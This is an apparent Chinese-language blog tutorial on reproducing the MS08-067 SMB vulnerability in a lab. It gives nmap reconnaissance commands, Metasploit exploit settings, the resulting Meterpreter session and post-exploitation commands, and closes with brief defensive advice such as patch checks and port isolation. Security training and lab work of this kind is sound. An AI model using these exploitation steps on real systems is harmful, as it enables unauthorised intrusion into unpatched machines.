1. 信息收集锁定目标的第一步搞安全测试的朋友都知道信息收集就像侦探破案前的现场勘查。我去年在给某企业做内网渗透时就深刻体会到这一步的重要性。当时花了整整三天时间做信息收集最后只用半小时就拿下了目标服务器。下面我以MS08-067漏洞复现为例分享我的实战经验。首先得找到目标在哪。用nmap扫整个网段是最基础的操作nmap -sn 192.168.1.0/24这个命令就像拿着喇叭在小区里喊有人吗-sn参数表示只做Ping扫描。扫完后你会看到类似这样的结果Nmap scan report for 192.168.1.105 Host is up (0.045s latency). MAC Address: 00:0C:29:XX:XX:XX (VMware)看到有回应的IP后接下来要做个全身检查。我习惯用这个组合拳nmap -sT --min-rate 10000 -p- 192.168.1.105 -oA initial_scan这里-sT是TCP全连接扫描--min-rate 10000让扫描速度飞起来-p-检查所有65535个端口。扫描结果通常会显示Windows服务器开放的经典三件套135(RPC)、139(NetBIOS)、445(SMB)。2. 漏洞侦查像医生做诊断拿到开放端口列表后真正的技术活才开始。去年我在某次红队行动中就遇到过看似普通的445端口背后藏着致命漏洞的情况。这时候需要做深度扫描nmap -sV -O -p135,139,445 192.168.1.105 --scriptsmb-os-discovery这个命令就像给服务器做CT扫描-sV探测服务版本-O识别操作系统--script参数调用nmap的smb脚本。关键要看这两处信息Service Info: OS: Windows XP SP2 or SP3 Service Info: Service pack: 3确认系统版本后上漏洞扫描脚本nmap --scriptvuln -p445 192.168.1.105如果运气好你会看到这样的关键信息| smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-42503. 攻击准备配置你的武器库找到漏洞就像拿到了钥匙但还得知道怎么开锁。MS08-067这个2008年的老漏洞至今仍在某些老旧系统上存在。启动Metasploit框架msfconsole然后按这个顺序操作search ms08-067 use exploit/windows/smb/ms08_067_netapi show options这里有个坑我踩过好几次——必须正确设置target参数。Windows XP SP3中文版对应的是34号target可以通过这个命令查看show targets设置参数时要特别注意set RHOSTS 192.168.1.105 set TARGET 344. 发起攻击一击必杀的关键所有准备就绪后就是见证奇迹的时刻。执行exploit如果一切顺利你会看到最令人激动的画面[*] Sending stage (175686 bytes) to 192.168.1.105 [*] Meterpreter session 1 opened拿到meterpreter会话后就像拿到了服务器的遥控器。可以执行这些命令验证sysinfo getuid shell我习惯第一时间运行ipconfig /all查看内网情况有时候能发现更多跳板机。5. 实战经验那些年我踩过的坑第一次复现这个漏洞时我遇到了三个典型问题防火墙拦截靶机必须关闭防火墙或者你有办法绕过系统版本不匹配英文版和中文版的target编号不同补丁干扰有些系统看似没打补丁但实际上有热修复建议在虚拟机里准备这些环境Windows XP SP3中文版未打补丁关闭所有防护软件配置桥接网络6. 防御建议蓝队的必修课虽然MS08-067是个老漏洞但它的攻击手法至今仍有借鉴意义。作为防御方我建议定期更新漏洞扫描规则对445等高风险端口进行网络隔离部署IDS规则检测异常SMB流量可以用这个命令检测系统是否打了补丁Get-HotFix -Id KB958644如果返回结果说明补丁已安装。7. 延伸思考漏洞利用的进化MS08-067这类缓冲区溢出漏洞开启了Windows漏洞利用的一个时代。现在虽然有了ASLR、DEP等防护机制但攻击方式也在进化。去年我分析过几个新型漏洞发现攻击者开始更多利用逻辑漏洞和权限提升漏洞。建议安全研究人员多研究这些经典漏洞理解其底层原理。比如MS08-067本质是NetAPI32.dll中的栈缓冲区溢出通过精心构造的路径名触发。